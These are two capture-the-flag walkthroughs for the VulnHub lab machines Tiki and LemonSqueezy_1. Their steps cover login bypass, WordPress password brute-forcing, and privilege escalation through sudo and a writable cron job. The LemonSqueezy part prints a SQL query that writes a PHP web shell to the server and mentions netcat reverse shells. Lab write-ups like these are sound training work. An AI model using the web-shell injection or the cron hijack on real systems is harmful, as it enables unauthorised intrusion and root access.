Tiki

 TIKI

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Tiki, from the VulnHub pentesting platform.

-  Tiki can be downloaded from here:

https://www.vulnhub.com/entry/tiki-1,525/

- Once the virtual machine downloaded and extracted with VMware:

- By the way, the initial page indicates the existence of user silky:

- Netdiscover gives the IP 192.168.1.42:

2 - ENUMERATION

- Scanning all ports with Nmap:

- Scanning deeper port 80 and reading robots.txt there is a folder named /tiki:

- Dirbusting the web server:

- Browsing the web server:

- Going to /tiki it redirects to /tiki-index.php, where we can acces to a Login form:

- Enumerating with enum4linux we find user silky and shared folder Notes:

- Connecting to share folder Notes and dowloading content Mail.txt:

- Reading Mail.txt we discover some credentials:

3 - EXPLOITATION

- However these credentials are not enough to SSH the target:

- Searching for exploits related with Tiki:

- Taking the script 48927.py and copying it to the local working folder:

- Launching the Python script the answer gives us a couple of hints to exploit Tiki:

- So let's use BurpSuite to take advantage of the exploit:

- Intercepting Login credentials admin:admin with Burp:

- Removing password and turning the interception off the result is that we are logged in as admin:

- Going to the tab Search and finding tab Credentials we discover silky:Agy8Y7SPJNXQzqA

- SSH-ing with credentials silky:Agy8Y7SPJNXQzqA we have a shell:

4 - PRIVILEGE ESCALATION

- It is interesting that user silky is part of the group sudo:

- Also there is the file .sudo_as_admin_successful:

- We are lucky that user silky has full sudoer privileges:

- Finally we get a root shell:

5 - CAPTURING THE FLAG

- Reading flag.txt:

Lemon_Squeezy_1

LEMON SQUEEZY 1

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine LemonSqueezy_1, from the VulnHub pentesting platform.

-  LemonSqueezy_1 can be downloaded from here:

https://www.vulnhub.com/entry/lemonsqueezy-1,473/

- Once the virtual machine downloaded and extracted with VMware:

2 - ENUMERATION

- Scanning with Nmap:

- Browsing the web server:

- Dirbusting the web server we find /phpmyadmin and /wordpress:

- Going to /phpmyadmin:

- Going to /wordpress:

- Editing /etc/hosts:

- Now lemonsqueezy/wordpress presents the Wordpress webpage:

- Wpscan scans Wordpress, finding users lemon and orange:

- Adding users admin, orange and lemon to text  file users.txt:

- Wpscan and rockyou.txt find the password ginger for user orange:

- Logging into Wordpress with credentials orange:ginger:

- Reading the post we discover the potential password n0t1n@w0rdl1st!:

- Trying phpmyadmin now with credentials orange:n0t1n@w0rdl1st!:

- There are 2 encrypted passwords for lemon and orange:

- Hash-identifier identifies the hashes as MD5 (Wordpress), however after several trials we were not able to decrypt them:

3 - EXPLOITATION

- Creating a new table and entering this crafted SQL query we will inject the exploit shell.php: 

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/shell.php"

- Now we are able to perform Remote Code Execution with exploit shell.php, for instance commands like id:

- Also cat /etc/passwd:

- Now let's inject a Netcat reverse shell command towards Kali:

- It works and we have a shell:

4 - PRIVILEGE ESCALATION

- Looking for cron jobs we find logrotate, what is writable and can be run as root:

- Reading logrotate:

- Let's try to edit logrotate by writing an exploit to it.

- First, creating an exploit with Msfvenom:

- Setting a Netcat listener:

- Rewriting logrotate:

- Finally, after waiting for 2 minutes until logrotate is run, we get a root shell:

5 - CAPTURING THE FLAG

- Reading root.txt: